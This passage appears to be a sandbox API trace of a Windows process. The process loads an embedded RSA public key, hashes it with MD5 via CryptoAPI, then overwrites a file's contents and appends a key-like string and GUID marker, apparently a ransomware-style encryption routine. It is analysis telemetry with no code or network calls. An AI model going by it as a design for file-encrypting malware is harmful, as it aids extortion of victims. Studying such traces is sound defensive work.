lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0193.132] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=133) returned 1 [0193.132] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0193.135] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x5f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0193.135] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0193.136] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0193.136] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0193.136] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0193.136] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0x85, lpOverlapped=0x0) returned 1 [0193.136] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0193.136] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0193.136] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0193.136] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0193.136] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b9f8) returned 1 [0193.137] CryptCreateHash (in: hProv=0x31b9f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0193.137] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0193.137] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0193.137] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0193.137] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0193.137] GetLastError () returned 0x0 [0193.138] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0193.138] CryptReleaseContext (hProv=0x31b9f8, dwFlags=0x0) returned 1 [0193.138] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0193.138] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0193.138] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0193.138] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0193.138] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0193.138] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0193.138] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0193.138] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2adfe08 [0193.138] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0193.138] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0193.138] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0193.139] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0193.139] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2adf6e8 [0193.139] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0193.139] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af3d20 [0193.139] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6230 [0193.139] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af3d68 [0193.139] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6248 [0193.139] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6278 [0193.139] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae62d8 [0193.139] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6290 [0193.141] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0193.141] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0193.141] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aee1c8 [0193.141] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af3f88 [0193.141] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6278 | out: hHeap=0x2c0000) returned 1 [0193.141] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6290 | out: hHeap=0x2c0000) returned 1 [0193.141] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae62d8 | out: hHeap=0x2c0000) returned 1 [0193.141] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0193.142] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0193.142] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae62d8 [0193.142] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e30 [0193.142] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6290 [0193.142] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0193.142] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2ae6278 [0193.142] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e40 [0193.142] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0193.142] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7a40 [0193.142] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0193.142] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0193.142] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0193.142] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ae8 [0193.142] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0193.142] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0193.142] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6290 | out: hHeap=0x2c0000) returned 1 [0193.143] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0193.143] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6278 | out: hHeap=0x2c0000) returned 1 [0193.143] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0193.143] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0193.143] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae62d8 | out: hHeap=0x2c0000) returned 1 [0193.143] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0193.143] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0193.144] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aee1c8 | out: hHeap=0x2c0000) returned 1 [0193.144] GetCurrentThreadId () returned 0x5d8 [0193.144] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae00c8 [0193.144] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2ae7848 [0193.144] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42548 [0193.144] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b9f8 [0193.144] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0193.144] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0193.144] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0193.144] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0193.144] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0193.144] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0193.144] GetCurrentThreadId () returned 0x5d8 [0193.144] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0193.145] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0193.145] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0193.145] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0193.145] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0193.145] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0193.145] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0193.146] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0193.146] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae03e0 [0193.146] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0193.146] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40210 [0193.146] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0193.146] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0193.146] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0193.146] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae62d8 [0193.146] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0193.146] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0193.146] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0193.146] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0193.146] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0193.146] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0193.146] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0193.146] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0193.146] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6278 [0193.146] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0193.146] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e10 [0193.147] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0193.147] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0193.147] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0193.147] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0193.147] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0193.147] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6290 [0193.147] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0193.147] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0193.147] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0193.147] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6260 [0193.147] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0193.147] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae62f0 [0193.147] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0193.147] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e50 [0193.147] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0193.147] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae62c0 [0193.147] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0193.147] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae62a8 [0193.147] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0193.147] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6308 [0193.147] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae62a8 | out: hHeap=0x2c0000) returned 1 [0193.148] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae62a8 [0193.148] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae62c0 | out: hHeap=0x2c0000) returned 1 [0193.148] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e20 [0193.148] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0193.148] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0193.148] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0193.148] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7a40 [0193.148] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6278 | out: hHeap=0x2c0000) returned 1 [0193.148] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6278 [0193.148] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0193.148] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2adf8e0 [0193.148] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae62d8 | out: hHeap=0x2c0000) returned 1 [0193.148] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0193.148] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6308 | out: hHeap=0x2c0000) returned 1 [0193.148] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af3f88 [0193.148] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0193.148] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0193.148] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0193.148] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0193.148] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6278 | out: hHeap=0x2c0000) returned 1 [0193.148] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af41a0 [0193.149] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0193.149] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae04e8 [0193.149] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0193.149] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f8 | out: hHeap=0x2c0000) returned 1 [0193.150] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae03e0 | out: hHeap=0x2c0000) returned 1 [0193.150] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae04e8 | out: hHeap=0x2c0000) returned 1 [0193.150] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0193.150] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0193.150] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0193.151] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af41a0 | out: hHeap=0x2c0000) returned 1 [0193.151] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0193.151] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0193.151] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae62a8 | out: hHeap=0x2c0000) returned 1 [0193.151] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0193.151] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae62f0 | out: hHeap=0x2c0000) returned 1 [0193.151] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0193.151] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6290 | out: hHeap=0x2c0000) returned 1 [0193.151] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6260 | out: hHeap=0x2c0000) returned 1 [0193.152] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0193.152] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42548 | out: hHeap=0x2c0000) returned 1 [0193.152] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0193.152] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6248 | out: hHeap=0x2c0000) returned 1 [0193.153] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3d68 | out: hHeap=0x2c0000) returned 1 [0193.153] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adf8e0 | out: hHeap=0x2c0000) returned 1 [0193.154] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0193.154] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40210 | out: hHeap=0x2c0000) returned 1 [0193.154] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0193.154] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0193.154] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0193.154] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0193.155] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0193.155] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adf6e8 | out: hHeap=0x2c0000) returned 1 [0193.155] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0193.156] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0193.156] WriteFile (in: hFile=0x584, lpBuffer=0x2adfe08*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2adfe08*, lpNumberOfBytesWritten=0x2f9fb14*=0x80, lpOverlapped=0x0) returned 1 [0193.156] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adfe08 | out: hHeap=0x2c0000) returned 1 [0193.156] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x85, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0193.156] WriteFile (in: hFile=0x584, lpBuffer=0x2ae00c8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae00c8*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0193.157] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae00c8 | out: hHeap=0x2c0000) returned 1 [0193.157] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ee78 [0193.157] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2adf6e8 [0193.157] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2adf6e8, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0193.157] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af3f88 [0193.157] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adf6e8 | out: hHeap=0x2c0000) returned 1 [0193.158] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ee78 | out: hHeap=0x2c0000) returned 1 [0193.158] WriteFile (in: hFile=0x584, lpBuffer=0x2af3f88*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af3f88*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0193.158] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0193.158] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0193.158] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0193.159] CloseHandle (hObject=0x584) returned 1 [0193.160] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, 